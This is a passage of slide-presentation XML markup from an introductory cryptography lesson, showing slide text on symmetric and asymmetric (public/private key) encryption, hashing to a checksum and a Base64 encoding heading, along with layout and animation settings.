                    <a:sym typeface="Verdana"/>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="778" name="Quote Bubble"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="975360" y="216746"/>
                <a:ext cx="4118187" cy="1733975"/>
              </a:xfrm>
              <a:prstGeom prst="wedgeEllipseCallout">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 64583"/>
                  <a:gd name="adj2" fmla="val -97657"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="3333CC"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="CC6600"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="16200000" scaled="0"/>
              </a:gradFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="1300480">
                  <a:defRPr sz="2200">
                    <a:solidFill>
                      <a:srgbClr val="FF9900"/>
                    </a:solidFill>
                    <a:latin typeface="Verdana"/>
                    <a:ea typeface="Verdana"/>
                    <a:cs typeface="Verdana"/>
                    <a:sym typeface="Verdana"/>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="780" name="Different Keys…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="958903" y="325120"/>
              <a:ext cx="3893714" cy="1577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defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="2200">
                  <a:solidFill>
                    <a:srgbClr val="FFFF66"/>
                  </a:solidFill>
                  <a:latin typeface="Verdana"/>
                  <a:ea typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                  <a:sym typeface="Verdana"/>
                </a:rPr>
                <a:t>Different Keys</a:t>
              </a:r>
              <a:endParaRPr sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFF66"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="FFFF66"/>
                  </a:solidFill>
                  <a:latin typeface="Verdana"/>
                  <a:ea typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                  <a:sym typeface="Verdana"/>
                </a:rPr>
                <a:t>[Keys of a pair – Public and Private]</a:t>
              </a:r>
              <a:endParaRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFF66"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="2800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Verdana"/>
                  <a:ea typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                  <a:sym typeface="Verdana"/>
                </a:rPr>
                <a:t>ASYMMETRIC</a:t>
              </a:r>
              <a:endParaRPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="2800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Verdana"/>
                  <a:ea typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                  <a:sym typeface="Verdana"/>
                </a:rPr>
                <a:t>[PKI]</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776"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="776"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="77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9" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="781"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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76" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="781" grpId="2"/>
    </p:bldLst>
  </p:timing>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3" name="Cryptography"/>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Cryptography</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="784" name="Encrypt(“data”, Key) = “cipher”…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505937" y="2059093"/>
            <a:ext cx="9992926" cy="6676250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"/>
          <a:lstStyle/>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rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0"/>
              <a:t>(“data”, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0"/>
              <a:t>) = “cipher”</a:t>
            </a:r>
            <a:endParaRPr b="0"/>
          </a:p>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rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Decrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0"/>
              <a:t>(“cipher”, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0"/>
              <a:t>) = “data”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="785" name="Encrypt(“data”, Key1) = “cipher”…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505937" y="3821288"/>
            <a:ext cx="7369816" cy="211102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L="266700" indent="-266700" algn="l" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" sz="2800"/>
              <a:t>(“data”, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key1</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" sz="2800"/>
              <a:t>) = “cipher”</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" algn="l" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Decrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" sz="2800"/>
              <a:t>(“cipher”, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key2</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" sz="2800"/>
              <a:t>) = “data”</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" algn="l" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" sz="2800"/>
              <a:t>(“data”, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key2</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" sz="2800"/>
              <a:t>) = “cipher”</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" algn="l" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Decrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" sz="2800"/>
              <a:t>(“cipher”, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key2</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" sz="2800"/>
              <a:t>) = “data”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="786" name="Hash(“data”)= “checksum”"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505937" y="6412088"/>
            <a:ext cx="9992926" cy="211102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L="266700" indent="-266700" algn="l" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hash</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" sz="2800"/>
              <a:t>(“data”)= “checksum”</a:t>
            </a:r>
            <a:endParaRPr b="0" sz="28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784">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="784">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784">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="784">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="11" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="12" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="13" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="784">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78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Class="entr" nodeType="clickEffect" presetID="9" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="785">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="785">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetClass="entr" nodeType="withEffect" presetSubtype="0" presetID="9" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="785">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="785">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="23" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="24" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="785">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="785">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="27" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="28" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="29" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="785">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="785">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="31" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="32" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="33" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="785">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="785">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Class="entr" nodeType="clickEffect" presetID="9" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="38" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="786">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="786">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="40" presetClass="entr" nodeType="withEffect" presetSubtype="0" presetID="9" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="786">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="786">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Class="entr" nodeType="clickEffect" presetID="9" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="46" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="786">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="786">
                                            <p:txEl>
                                              <p:pRg st="1" end="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786" grpId="3"/>
      <p:bldP build="p" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="784" grpId="1"/>
      <p:bldP build="p" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="785" grpId="2"/>
    </p:bldLst>
  </p:timing>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0" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1625599" y="6615289"/>
            <a:ext cx="9916162" cy="959556"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15454"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F6F7EB"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
              <a:srgbClr val="C0C0C0"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="791" name="Base64 Encoding"/>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Base64 Encoding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="792" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
